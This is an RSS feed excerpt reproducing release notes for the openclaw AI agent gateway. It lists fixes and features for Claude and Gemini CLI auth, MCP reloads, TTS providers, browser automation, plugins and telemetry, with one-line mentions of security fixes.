<li>MCP/config reload: hot-apply <code>mcp.*</code> changes by disposing cached session MCP runtimes, and dispose bundled MCP runtimes during gateway shutdown so removed <code>mcp.servers</code> entries reap child processes promptly. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4203179674" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/60656" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/60656/hovercard" href="https://github.com/openclaw/openclaw/issues/60656">#60656</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/xieyuanqing/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/xieyuanqing">@xieyuanqing</a>.</li>
<li>Active Memory: keep silent recall sub-agent billing/auth failures out of shared auth-profile cooldown state, so a Claude CLI extra-usage rejection cannot disable normal Claude-backed turns. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4325943036" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71284" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71284/hovercard" href="https://github.com/openclaw/openclaw/issues/71284">#71284</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327867252" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71539" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71539/hovercard" href="https://github.com/openclaw/openclaw/pull/71539">#71539</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vishutdhar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vishutdhar">@vishutdhar</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/obviyus/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/obviyus">@obviyus</a>.</li>
<li>Auth/Claude CLI: sync refreshed Claude CLI OAuth credentials into the managed auth profile so long-running Claude CLI runs stop falling back to stale OpenClaw snapshots. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4320240541" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70902" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70902/hovercard" href="https://github.com/openclaw/openclaw/pull/70902">#70902</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/starvex/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/starvex">@starvex</a>.</li>
<li>Sessions: make <code>sessions_spawn(mode="session")</code> errors name usable alternatives when the current channel cannot bind subagent threads. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4271801625" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67400" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/67400/hovercard" href="https://github.com/openclaw/openclaw/issues/67400">#67400</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4277983433" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67790" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/67790/hovercard" href="https://github.com/openclaw/openclaw/pull/67790">#67790</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stainlu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stainlu">@stainlu</a>.</li>
<li>Agents/Claude CLI: pass the OpenClaw system prompt through Claude's prompt-file flag so Windows runs avoid argv length failures without changing system prompt semantics. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4292748556" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69158" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69158/hovercard" href="https://github.com/openclaw/openclaw/issues/69158">#69158</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4293340040" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69211" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69211/hovercard" href="https://github.com/openclaw/openclaw/pull/69211">#69211</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/skylee-01/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/skylee-01">@skylee-01</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/cassioanorte/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/cassioanorte">@cassioanorte</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Syu0/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Syu0">@Syu0</a>, and @Stache73.</li>
<li>Agents/CLI sessions: bind <code>google-gemini-cli</code> session auth-epoch to the Google account identity in <code>~/.gemini/oauth_creds.json</code>, so Gemini-backed agents resume their conversation after gateway restart instead of minting a fresh session, and stale bindings are invalidated when the authenticated Google account changes. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4321086277" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70973" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70973/hovercard" href="https://github.com/openclaw/openclaw/issues/70973">#70973</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4322606915" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71076" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71076/hovercard" href="https://github.com/openclaw/openclaw/pull/71076">#71076</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/openperf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/openperf">@openperf</a>.</li>
<li>Slack: stop treating user mentions in assistant-authored message edit blocks as sender attribution, preventing edited bot messages from spoofing a mentioned DM user. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4328906494" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71700" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71700/hovercard" href="https://github.com/openclaw/openclaw/pull/71700">#71700</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Codex: consume unauthorized bound conversation inbound claims before they can fall through to other claim handlers or enqueue Codex turns. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4328907337" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71702" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71702/hovercard" href="https://github.com/openclaw/openclaw/pull/71702">#71702</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Codex media understanding: require approval-checked app-server image turns while explicitly declining tool, file, permission, and elicitation approval requests for the bounded image worker. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4328907702" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71703" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71703/hovercard" href="https://github.com/openclaw/openclaw/pull/71703">#71703</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Agents/Claude CLI: allow large live <code>stream-json</code> JSONL lines up to the existing per-turn raw limit, preventing large Telegram, WebChat, MCP, and image turns from aborting on the old stdout buffer cap. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329383401" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71793" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71793/hovercard" href="https://github.com/openclaw/openclaw/issues/71793">#71793</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4322675128" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71080" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71080/hovercard" href="https://github.com/openclaw/openclaw/issues/71080">#71080</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4318647707" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70766" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70766/hovercard" href="https://github.com/openclaw/openclaw/issues/70766">#70766</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329830196" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71897" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71897/hovercard" href="https://github.com/openclaw/openclaw/pull/71897">#71897</a>) Thanks @chacher86, @shivamgrover21, and @tpjordan.</li>
<li>Agents/Claude CLI: unwrap nested Claude result envelopes in CLI JSON output so delegated agent responses surface as final text instead of raw result JSON. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4264813860" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66819" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/66819/hovercard" href="https://github.com/openclaw/openclaw/pull/66819">#66819</a>) Thanks @mraleko.</li>
<li>Agents/Claude CLI: apply the configured 1M context window override to eligible Claude CLI Opus and Sonnet models when <code>context1m</code> is enabled. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4319842892" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70863" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70863/hovercard" href="https://github.com/openclaw/openclaw/pull/70863">#70863</a>) Thanks @bidadh.</li>
<li>Models/status: report fresh Claude CLI native auth instead of stale stored <code>anthropic:claude-cli</code> profile expiry when local credentials are current. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4325517974" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71256" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71256/hovercard" href="https://github.com/openclaw/openclaw/issues/71256">#71256</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4326550173" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71332" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71332/hovercard" href="https://github.com/openclaw/openclaw/pull/71332">#71332</a>) Thanks @matthiasjanke and @neeravmakwana.</li>
<li>CLI backends: compact OpenClaw transcripts after over-budget CLI turns and reseed fresh CLI sessions from the compacted transcript instead of stale external resume state. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4285899710" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68329" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68329/hovercard" href="https://github.com/openclaw/openclaw/issues/68329">#68329</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329888680" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71916" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71916/hovercard" href="https://github.com/openclaw/openclaw/pull/71916">#71916</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/obviyus/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/obviyus">@obviyus</a>.</li>
<li>Telegram: keep default tool progress messages visible when answer preview streaming is disabled. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329509796" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71825" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71825/hovercard" href="https://github.com/openclaw/openclaw/pull/71825">#71825</a>) Thanks @VACInc.</li>
<li>Configure/models: clear deselected model fallbacks when updating the model picker allowlist, including provider-scoped setup flows. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4328198274" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71596" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71596/hovercard" href="https://github.com/openclaw/openclaw/pull/71596">#71596</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rubencu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rubencu">@rubencu</a>.</li>
<li>Agents/streaming: strip namespaced <code>&lt;antml:thinking&gt;</code> reasoning tags from streamed assistant replies before user-visible text is emitted. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4294779031" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69288" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69288/hovercard" href="https://github.com/openclaw/openclaw/pull/69288">#69288</a>) Thanks @xialonglee.</li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[openclaw 2026.4.25-beta.2]]></title>
<description><![CDATA[2026.4.25
Highlights

Voice replies get a full TTS upgrade: /tts latest, chat-scoped auto-TTS controls, personas, per-agent/per-account overrides, and new Azure Speech, Xiaomi, Local CLI, Inworld, Volcengine, and ElevenLabs v3 provider coverage. Thanks @leonchui, @zoujiejun, @solar2ain, @cshape, ...]]></description>
<link>https://tsecurity.de/de/3465731/downloads/openclaw-2026425-beta2/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3465731/downloads/openclaw-2026425-beta2/</guid>
<pubDate>Sun, 26 Apr 2026 14:30:49 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>2026.4.25</h2>
<h3>Highlights</h3>
<ul>
<li>Voice replies get a full TTS upgrade: <code>/tts latest</code>, chat-scoped auto-TTS controls, personas, per-agent/per-account overrides, and new Azure Speech, Xiaomi, Local CLI, Inworld, Volcengine, and ElevenLabs v3 provider coverage. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/leonchui/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/leonchui">@leonchui</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zoujiejun/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zoujiejun">@zoujiejun</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/solar2ain/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/solar2ain">@solar2ain</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/cshape/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/cshape">@cshape</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/xuruiray/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/xuruiray">@xuruiray</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/itsuzef/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/itsuzef">@itsuzef</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/barronlroth/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/barronlroth">@barronlroth</a>.</li>
<li>Plugin startup and install paths move to the cold persisted registry, cutting broad manifest scans while making plugin update, repair, provider discovery, and install metadata more deterministic. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>OpenTelemetry coverage expands across model calls, token usage, tool loops, harness runs, exec processes, outbound delivery, context assembly, and memory pressure with bounded low-cardinality attributes. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jlapenna/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jlapenna">@jlapenna</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Lidang-Jiang/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Lidang-Jiang">@Lidang-Jiang</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/oc-factus/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/oc-factus">@oc-factus</a>.</li>
<li>Browser automation gets safer tab URLs, iframe-aware role snapshots, CDP readiness tuning, headless one-shot launch, and deeper browser doctor probes for slow hosts. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/beat843796/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/beat843796">@beat843796</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BenediktSchackenberg/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BenediktSchackenberg">@BenediktSchackenberg</a>.</li>
<li>Control UI and setup flows add PWA/Web Push support, Crestodian first-run repair, TUI setup, context mode selection, and a shorter startup greeting. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/eduardocruz/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/eduardocruz">@eduardocruz</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/SebTardif/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/SebTardif">@SebTardif</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kevinlin-openai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kevinlin-openai">@kevinlin-openai</a>.</li>
<li>Install/update hardening covers Windows, macOS, Linux, Docker, bundled plugin runtime deps, Node service restarts, LaunchAgent token rotation, and mixed-version gateway verification. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Kobevictor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Kobevictor">@Kobevictor</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/igormf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/igormf">@igormf</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/abhinas90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/abhinas90">@abhinas90</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jsompis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jsompis">@jsompis</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Solvely-Colin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Solvely-Colin">@Solvely-Colin</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/gucasbrg/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/gucasbrg">@gucasbrg</a>.</li>
</ul>
<h3>Changes</h3>
<ul>
<li>TTS/WhatsApp: add <code>/tts latest</code> read-aloud support with duplicate suppression and <code>/tts chat on|off|default</code> session-scoped auto-TTS overrides, completing the on-demand voice-note UX for current-chat replies. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4256179902" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66032" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/66032/hovercard" href="https://github.com/openclaw/openclaw/issues/66032">#66032</a>.</li>
<li>TTS/channels: resolve channel and account TTS overrides generically, enabling Feishu and QQBot accounts to deep-merge <code>channels.&lt;channel&gt;.accounts.&lt;id&gt;.tts</code> over global and per-agent TTS config. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sahilsatralkar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sahilsatralkar">@sahilsatralkar</a>.</li>
<li>TTS/agents: allow <code>agents.list[].tts</code> to override global <code>messages.tts</code> for per-agent voices, and make <code>/tts audio</code>, <code>/tts status</code>, and the <code>tts</code> agent tool honor the active voice/provider override while keeping shared provider credentials and preferences in the existing TTS config surface.</li>
<li>Providers/Azure Speech: add Azure Speech as a bundled TTS provider with Speech-resource auth, voice listing, SSML escaping, native Ogg/Opus voice-note output, and telephony output. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4113089889" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/51776" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/51776/hovercard" href="https://github.com/openclaw/openclaw/pull/51776">#51776</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/leonchui/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/leonchui">@leonchui</a>.</li>
<li>Google Meet: add calendar-backed attendance export workflows, export manifests, dry-run previews, and tool parity for meeting records.</li>
<li>Control UI: add PWA install support and Web Push notifications for Gateway chat. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4068543152" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/44590" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/44590/hovercard" href="https://github.com/openclaw/openclaw/pull/44590">#44590</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/eduardocruz/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/eduardocruz">@eduardocruz</a>.</li>
<li>Browser automation: add safe tab URLs in agent responses plus a CDP-native role snapshot fallback with iframe-aware refs, cursor-clickable detection, target attach preparation, and <code>openclaw browser doctor --deep</code> live snapshot probing.</li>
<li>CLI/image generation: expose generic <code>--background</code> on <code>openclaw infer image generate</code> and <code>openclaw infer image edit</code>, keep <code>--openai-background</code> as an OpenAI alias, and let fal image generation honor <code>--output-format png|jpeg</code>.</li>
<li>Browser/config: allow local managed Chrome launch discovery and post-launch CDP readiness timeouts to be raised for slower hosts such as Raspberry Pi. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4264662087" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66803" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/66803/hovercard" href="https://github.com/openclaw/openclaw/issues/66803">#66803</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/beat843796/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/beat843796">@beat843796</a>.</li>
<li>Discord: allow <code>channels.discord.voice.model</code> to override the LLM used for voice channel responses while keeping STT and TTS on their existing media settings. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4240023484" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64368" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/64368/hovercard" href="https://github.com/openclaw/openclaw/pull/64368">#64368</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mrdavey/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mrdavey">@mrdavey</a>.</li>
<li>Browser/CLI: add <code>openclaw browser start --headless</code> as a one-shot local managed browser launch override without rewriting persisted browser config. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BenediktSchackenberg/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BenediktSchackenberg">@BenediktSchackenberg</a>.</li>
<li>CLI/Crestodian/TUI: add the first-run setup helper, local planner fallback, full-TUI interactive Crestodian, startup progress indicators, context mode selector, and a shorter startup greeting. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329002099" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71720" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71720/hovercard" href="https://github.com/openclaw/openclaw/pull/71720">#71720</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329176612" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71760" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71760/hovercard" href="https://github.com/openclaw/openclaw/pull/71760">#71760</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/SebTardif/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/SebTardif">@SebTardif</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kevinlin-openai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kevinlin-openai">@kevinlin-openai</a>.</li>
<li>Plugins: migrate the local plugin registry automatically during package install/update, keeping install metadata in the plugin index while indexing existing plugin manifests for the new cold registry path. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Plugins/doctor: make <code>openclaw doctor --fix</code> refresh the plugin index and cold registry index when needed without treating plugin install records as authored config. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Plugins/hooks: add before-agent-finalize hooks, cron <code>jobId</code> hook context, bounded native permission fingerprints, and Codex MCP hook relay support. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329196089" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71765" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71765/hovercard" href="https://github.com/openclaw/openclaw/pull/71765">#71765</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329172189" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71758" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71758/hovercard" href="https://github.com/openclaw/openclaw/pull/71758">#71758</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4328919273" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71707" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71707/hovercard" href="https://github.com/openclaw/openclaw/pull/71707">#71707</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pashpashpash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pashpashpash">@pashpashpash</a>.</li>
<li>Plugins/tokenjuice: bump the bundled tokenjuice runtime to 0.6.3. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Diagnostics/OTEL: align model-call GenAI span attributes with OpenTelemetry stability opt-in semantics, keeping legacy <code>gen_ai.system</code> by default while emitting <code>gen_ai.provider.name</code> under <code>OTEL_SEMCONV_STABILITY_OPT_IN=gen_ai_latest_experimental</code>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Diagnostics/OTEL: support signal-specific OTLP endpoint overrides for traces, metrics, and logs via config or standard OTEL environment variables. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
